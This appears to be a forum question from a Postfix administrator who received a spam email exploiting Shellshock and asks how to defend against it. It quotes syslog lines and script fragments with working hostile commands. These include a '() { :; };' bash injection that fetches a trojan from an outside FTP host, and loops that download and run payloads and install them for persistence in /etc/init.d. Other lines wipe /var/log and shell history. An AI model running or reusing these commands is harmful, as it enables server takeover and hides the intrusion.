Yesterday I got a email sent {@DOMAIN.ORG from my mailserver the mail was marked as spam.
The body included scripts download commands like ftp://ftp.ugotownedz.org/upfile2.sh
lines from syslog
Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82]
Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O ... -rf /root/.bash_history; rm -rf /var/log/*"
In fact this very simple un-encrypted shell script tries to establish a trojan. To me, it looks rather dirty and it was unsuccessful.
But anyway, is there anything I can do to protect postfix against those types of hacks?
From the script
...
echo sshdo.ico >> /tmp/upfile
for file in $(cat /tmp/upfile); do killall $file; ls /tmp/.udp/$file || wget ftp://$1/$file -O /tmp/.udp/$file; chmod +x /tmp/.udp/$file; /tmp/.udp/$file; perl /tmp/.udp/Xorg; perl /tmp/.udp/crun.d ; php /tmp/.udp/sshdo.ico; php sshdo.ico; rm -rf /tmp/.udp/sshdo.ico /tmp/.udp/crun.d /tmp/.udp/Xorg ; done
...
for file6 in $(cat /tmp/upfile); do cp /tmp/.udp/$file6 /etc/init.d/$file6;cp /tmp/.udp/$file6 /etc/init.d/$file6; chmod +x /etc/init.d/$file6; sudo update-rc.d $file6 defaults ; done
...
chattr +i /tmp/.udp/*
rm -rf /var/log/*
